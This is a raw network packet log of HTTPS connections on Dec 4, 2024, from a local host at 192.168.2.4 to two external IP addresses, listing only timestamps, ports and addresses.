Dec 4, 2024 12:17:46.069683075 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.071274042 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.071290016 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.071383953 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.071402073 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.071511984 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.071542978 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.071654081 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.073437929 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.073503017 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.073522091 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.073575020 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.073581934 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.073596001 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.073611975 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.073642969 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.073657036 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.073684931 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.073695898 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.073698044 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.073718071 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.073823929 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.075304985 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.075376034 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.075479031 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.075519085 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.075615883 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.075633049 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.075747967 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.077351093 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.077366114 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.077455997 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.077507019 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.077604055 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.077636957 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.077733040 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.079046965 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.079138041 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.079160929 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.079252005 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.079272985 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.079366922 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.079385996 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.079487085 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.081662893 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.081727028 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.081826925 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.081875086 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.081975937 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.081996918 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.082001925 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.082083941 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.084434032 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.084449053 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.084532022 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.084554911 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.084587097 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.084682941 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.084717989 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.084733963 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.084835052 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.086832047 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.086847067 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.086942911 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.086973906 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.087090015 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.088428974 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.088521957 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.088521957 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.088552952 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.088651896 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.088680983 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.088692904 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.088818073 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.088857889 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.103244066 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.131336927 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.191464901 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.191667080 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.191704035 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.191822052 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.191848993 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.191951990 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.191983938 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.191991091 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.199851990 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.199868917 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.199984074 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.200006008 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.200107098 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.208339930 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.208477020 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.208498001 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.208550930 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.208699942 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.208743095 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.208743095 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.208755970 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.212543964 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.216680050 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.216701031 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.216813087 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.216841936 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.216849089 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.216866016 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.216952085 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.216984987 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.217019081 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.217019081 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.217052937 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.217052937 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.223643064 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.223687887 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.223757029 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.223784924 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.223799944 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.223800898 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.223819971 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.223862886 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.223880053 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.223881960 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.223917007 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.223925114 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.223978043 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.223999023 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.223999023 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.224006891 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.224029064 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.224148035 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.267340899 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.311043978 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.311168909 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.311219931 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.311464071 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.327104092 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.327225924 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.327258110 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.327265978 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.327402115 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.327442884 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.327507973 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.327666044 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.327699900 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.327831984 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.327866077 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.327877045 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.327918053 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.328022003 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.328049898 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.328051090 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.328051090 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.328058958 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.328074932 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.328166008 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.328181982 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.328192949 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.328299999 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.328331947 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.328339100 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.328425884 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.328483105 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.328520060 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.328520060 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.328542948 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.328625917 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.328636885 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.328754902 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.329016924 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.329104900 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.329114914 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.329129934 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.329200983 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.329221010 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.329236031 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.329274893 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.329318047 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.329346895 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.351957083 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.351979017 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.352140903 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.352168083 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.352334023 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.352356911 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.352524042 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.352555037 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.399331093 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.428800106 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.428944111 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.428987026 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.429133892 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.433104038 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.433154106 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.433300972 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.433341980 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.433362961 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.433485031 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.433523893 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.440109968 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.440213919 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.440237999 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.440334082 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.440419912 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.440825939 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.440845966 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.452001095 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.452065945 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.452183008 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.452214003 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.452245951 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.452351093 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.452373028 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.459443092 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.459568024 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.459600925 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.459666967 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.459702969 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.465560913 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.472599030 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.948584080 CET	443	49872	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:46.949599028 CET	49872	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:46.949639082 CET	443	49872	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:46.950081110 CET	49872	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:46.950088978 CET	443	49872	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:46.951915979 CET	443	49873	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:46.952511072 CET	49873	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:46.952533007 CET	443	49873	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:46.953793049 CET	49873	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:46.953798056 CET	443	49873	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:46.974462986 CET	443	49877	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.974545002 CET	49877	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.975001097 CET	49877	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.975018024 CET	443	49877	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.977080107 CET	49877	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.977099895 CET	443	49877	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:47.017641068 CET	443	49875	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.018174887 CET	49875	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.018193960 CET	443	49875	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.018430948 CET	443	49874	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.018701077 CET	49875	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.018706083 CET	443	49875	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.019032001 CET	49874	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.019059896 CET	443	49874	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.019444942 CET	49874	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.019452095 CET	443	49874	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.268768072 CET	443	49876	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.269514084 CET	49876	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.269546032 CET	443	49876	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.270005941 CET	49876	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.270014048 CET	443	49876	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.382771969 CET	443	49872	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.386571884 CET	443	49872	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.386779070 CET	49872	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.386779070 CET	49872	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.386779070 CET	49872	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.386931896 CET	443	49873	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.389748096 CET	49878	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.389795065 CET	443	49878	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.389883041 CET	49878	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.390012980 CET	443	49873	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.390065908 CET	49878	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.390072107 CET	49873	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.390083075 CET	443	49878	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.390125990 CET	49873	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.390144110 CET	443	49873	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.390153885 CET	49873	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.390160084 CET	443	49873	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.392718077 CET	49879	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.392741919 CET	443	49879	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.392806053 CET	49879	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.392951012 CET	49879	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.392961025 CET	443	49879	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.462279081 CET	443	49874	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.462312937 CET	443	49874	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.462373018 CET	443	49874	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.462528944 CET	49874	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.462528944 CET	49874	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.463994980 CET	443	49875	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.464095116 CET	49874	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.464123964 CET	443	49874	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.464138985 CET	49874	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.464144945 CET	443	49874	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.467216969 CET	443	49875	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.467221022 CET	49880	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.467242002 CET	443	49880	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.467278004 CET	49875	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.467318058 CET	49880	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.467355967 CET	49875	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.467367887 CET	443	49875	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.467377901 CET	49875	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.467382908 CET	443	49875	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.469244003 CET	49881	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.469266891 CET	443	49881	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.469321012 CET	49881	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.469453096 CET	49880	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.469464064 CET	443	49880	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.469574928 CET	49881	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.469588995 CET	443	49881	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.702501059 CET	443	49876	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.704494953 CET	49872	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.704534054 CET	443	49872	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.706276894 CET	443	49876	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.706341028 CET	49876	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.709135056 CET	49876	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.709156036 CET	443	49876	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.709170103 CET	49876	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.709176064 CET	443	49876	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.735626936 CET	49882	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.735668898 CET	443	49882	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.735737085 CET	49882	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.740115881 CET	49882	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:47.740130901 CET	443	49882	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:47.850398064 CET	443	49877	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:47.850420952 CET	443	49877	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:47.850474119 CET	443	49877	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:47.850548983 CET	49877	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:47.850600958 CET	49877	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:47.873193026 CET	49877	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:47.873210907 CET	443	49877	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:47.888315916 CET	49883	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:47.888344049 CET	443	49883	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:47.888420105 CET	49883	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:47.888665915 CET	49883	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:47.888674974 CET	443	49883	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:49.107080936 CET	443	49879	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.107988119 CET	443	49878	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.112663031 CET	49879	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.112675905 CET	443	49879	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.113313913 CET	49879	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.113323927 CET	443	49879	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.113620043 CET	49878	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.113641024 CET	443	49878	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.114165068 CET	49878	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.114170074 CET	443	49878	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.184798002 CET	443	49881	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.185738087 CET	49881	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.185748100 CET	443	49881	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.186171055 CET	49881	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:49.186180115 CET	443	49881	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.187686920 CET	443	49880	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:49.189815044 CET	49880	443	192.168.2.4	13.107.246.63
